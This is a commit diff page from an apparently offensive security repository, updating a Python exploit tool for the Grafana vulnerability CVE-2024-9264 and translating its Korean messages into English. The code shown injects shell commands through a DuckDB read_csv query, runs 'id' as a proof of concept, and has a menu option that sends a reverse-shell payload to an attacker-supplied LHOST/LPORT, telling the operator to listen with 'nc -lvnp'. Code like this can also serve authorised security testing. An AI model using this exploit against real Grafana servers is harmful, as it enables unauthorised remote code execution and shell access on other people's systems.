peregr1nus/seckrity-cve
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

CVE-2024-9264 Module Modified

Browse Source
This commit is contained in:
Ubuntu
2025-10-07 10:23:45 +00:00
parent af32ef356a
commit 9acb2ae04a
1 changed files with 39 additions and 34 deletions
Download Patch File Download Diff File Expand all files Collapse all files

73
CVE-2024-9264/exploit.py
View File

@@ -79,7 +79,7 @@ class GrafanaExploit:
if "buildInfo" in data and "version" in data["buildInfo"]:
return data["buildInfo"]["version"]
except Exception as e:
error(f"버전 확인 실패: {e}")
error(f"Version Check Failed: {e}")
return "Unknown"
def login(self) -> bool:
@@ -91,7 +91,7 @@ class GrafanaExploit:
if r.status_code == 200 and "Logged in" in r.text:
return True
except Exception as e:
error(f"로그인 실패: {e}")
error(f"Login Failed: {e}")
return False
def run_query(self, query: str) -> Optional[List[Any]]:
@@ -151,19 +151,19 @@ class GrafanaExploit:
f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')"
)
self.run_query(query)
return self.read_remote_file(tmp_file)
return None
# -------------------------
# 메뉴 실행
# -------------------------
def menu():
print("\n[ 메뉴 ]")
print("1) 버전 탐색")
print("2) 취약한 버전과 비교")
print("3) 익스플로잇 (id 실행)")
print("4) 리버스 셸 획득")
print("5) 나가기")
print("\n[ Menu ]")
print("1) Version Check")
print("2) Vuln Check")
print("3) Exploit")
print("4) Exploit with Reverse Shell")
print("5) Exit")
if __name__ == "__main__":
if len(sys.argv) < 2:
@@ -171,6 +171,7 @@ if __name__ == "__main__":
sys.exit(1)
url = sys.argv[1]
info("Taget URL: " + url)
exploit = GrafanaExploit(url)
while True:
@@ -178,14 +179,15 @@ if __name__ == "__main__":
choice = input(">> ")
if choice == "1":
info("Grafana 버전 확인 중...")
log_event("Version Check Started")
info("Checking Grafana Version...")
ver = exploit.get_version()
print("Grafana Version:", ver)
vuln("Grafana Version: " + ver)
elif choice == "2":
info("취약 버전 리스트와 비교 중...")
log_event("Vuln Check Started")
ver = exploit.get_version()
print("현재 Grafana Version:", ver)
info("Current Grafana Version: " + ver)
# CVE-2024-9264 영향/패치 버전 목록
patched_versions = [
@@ -204,48 +206,51 @@ if __name__ == "__main__":
min_patched = min(Version(v) for v in patched_versions)
if curr < vs:
success(f"{ver} 은 11.0.0 이전 버전으로, CVE-2024-9264 영향 없음.")
success(f"{ver} is not vulnerable to CVE-2024-9264")
elif curr >= min_patched:
success(f"{ver} 은 패치된 버전 이상입니다. 취약하지 않을 가능성이 높습니다.")
success(f"{ver} is not vulnerable to CVE-2024-9264")
else:
vuln(f"{ver} 은 CVE-2024-9264에 취약합니다. 즉시 업그레이드 필요!")
vuln(f"{ver} is vulnerable to CVE-2024-9264")
except InvalidVersion:
error(f"버전 파싱 실패: {ver}")
error(f"Version parse failed: {ver}")
elif choice == "3":
info("로그인 시도...")
log_event("Exploit Started")
info("Trying to Login...")
if exploit.login():
success("로그인 성공")
info("PoC 실행 (id)...")
success("Login Success")
info("Exploit...")
output = exploit.check_vuln()
if output:
vuln("취약점 확인됨 (id 결과):")
vuln("Exploit Success (id Result):")
print(output.decode(errors="ignore"))
else:
success("취약점 동작 안 함")
success("Exploit is not working")
else:
error("로그인 실패")
error("Login Failed")
elif choice == "4":
info("리버스 셸 시도...")
log_event("Exploit with Reverse Shell Started")
info("Trying to Get Reverse Shell...")
if exploit.login():
success("로그인 성공")
lhost = input("공격자 IP (LHOST): ")
lport = input("공격자 PORT (LPORT): ")
success("Login Success")
lhost = input("Attacker IP (LHOST): ")
lport = input("Attacker PORT (LPORT): ")
try:
lport = int(lport)
info(f"리버스 셸 연결 시도 ({lhost}:{lport})")
print(Fore.YELLOW + f"[!] 공격자 측에서 `nc -lvnp {lport}` 실행 중이어야 합니다.")
info(f"Trying to Connect Reverse Shell ({lhost}:{lport})")
info(f"Attacker must be running `nc -lvnp {lport}` Command")
exploit.reverse_shell(lhost, lport)
vuln("리버스 셸 페이로드 전송 완료.")
vuln("Reverse Shell Query Transmission Success.")
except Exception as e:
error(f"리버스 셸 실행 오류: {e}")
error(f"Reverse Shell not working: {e}")
else:
error("로그인 실패")
error("Login Failed")
elif choice == "5":
info("프로그램 종료")
log_event("Exit Started")
info("Exiting...")
break
else:
error("잘못된 입력")
error("Wrong Input")